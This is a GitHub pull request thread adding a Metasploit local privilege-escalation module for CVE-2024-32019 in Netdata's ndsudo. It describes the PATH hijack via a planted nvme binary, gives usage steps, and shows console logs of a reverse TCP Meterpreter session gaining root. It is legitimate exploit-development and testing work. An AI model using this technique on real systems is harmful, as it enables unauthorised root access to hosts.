@msutovsky-r7 msutovsky-r7 commented Aug 11, 2025

This PR adds a module for CVE-2024-32019 - privilege escalation for ndsudo.

Vulnerable Application

The ndsudo is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the ndsudo binary. The vulnerability is an untrusted search path, when searching for additional binary files, such as nvme. An attacker can create a malicious binary with the same name and add the directory of this binary to the $PATH variable. The ndsudo will trust the first occurrence of this binary and execute it.

Installation steps:

  1. sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev pkg-config liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev
  2. wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz
  3. gunzip netdata-latest.tar.gz
  4. tar -xf netdata-latest.tar
  5. cd netdata-v1.45.0-8-g5803c7766/
  6. sudo ./netdata-installer.sh

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Receive a session
  4. Do: use exploit/linux/local/ndsudo_cve_2024_32019
  5. Do: set session [session number]
  6. Do: run
  7. Get root shell/meterpreter session

Options

WritableDir

A path where the malicious nvme binary will be stored. This path will later be prepended to the $PATH variable to achieve privilege escalation.

NdsudoPath

A path to the ndsudo binary.

Scenarios

msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Creating malicious file at /tmp/nvme
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Executing..
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.200
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.5.134.200
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@@ -0,0 +1,60 @@
## Vulnerable Application

The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
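
Review bot: in the `## Vulnerable Application` paragraph, the text never says why running the attacker's `nvme` yields elevated privileges; add a sentence stating that `ndsudo` runs with root privileges, and name the first fixed release alongside "v1.45.0 and below" so a reader can tell whether a host is patched. The same paragraph has "occurence" for "occurrence" and is missing articles in "contain vulnerability" and "create malicious binary".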

Suggested change
The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
The `ndsudo` is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the `ndsudo` binary. The vulnerability is an untrusted search path. When searching for additional binary files, such as `nvme`, an attacker can create a malicious binary with same name and add the directory of this binary into the `$PATH` variable. The `ndsudo` will trust the first occurrence of this binary and execute it.
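
Review bot: the sentence split in the suggested text changes who is searching: "When searching for additional binary files, such as `nvme`, an attacker can create ..." now reads as if the attacker performs the search, while the original line attributes the search to `ndsudo`. Wording such as "When `ndsudo` searches for additional binaries such as `nvme`, it trusts `$PATH`, so an attacker can ..." keeps the subject straight; "with same name" also still needs "the".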

@msutovsky-r7 msutovsky-r7 marked this pull request as ready for review August 15, 2025 05:27
mayurtadvi352-svg added a commit to mayurtadvi352-svg/metasploit-framework that referenced this pull request Aug 15, 2025

@smcintyre-r7 smcintyre-r7 left a comment

Things look good to me. I was able to test this out and confirm it's working as intended. Nice work @msutovsky-r7, thanks for adding this exploit.

msf exploit(linux/local/ndsudo_cve_2024_32019) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: smcintyre @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.134
OS           : Ubuntu 24.04 (Linux 6.11.0-25-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(linux/local/ndsudo_cve_2024_32019) > show options 

Module options (exploit/linux/local/ndsudo_cve_2024_32019):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf exploit(linux/local/ndsudo_cve_2024_32019) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.134
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.134:41390) at 2025-08-20 14:11:19 -0400


meterpreter > 
meterpreter > getuid
Server username: root @ ubuntu (uid=1000, gid=1000, euid=0, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.134
OS           : Ubuntu 24.04 (Linux 6.11.0-25-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/home/smcintyre/netdata-v1.45.0-8-g5803c7766
meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit 5735a82 into rapid7:master Aug 20, 2025
17 checks passed
@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 20, 2025
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 20, 2025
@bwatters-r7

Release Notes

Adds a module for CVE-2024-32019 - privilege escalation for ndsudo.
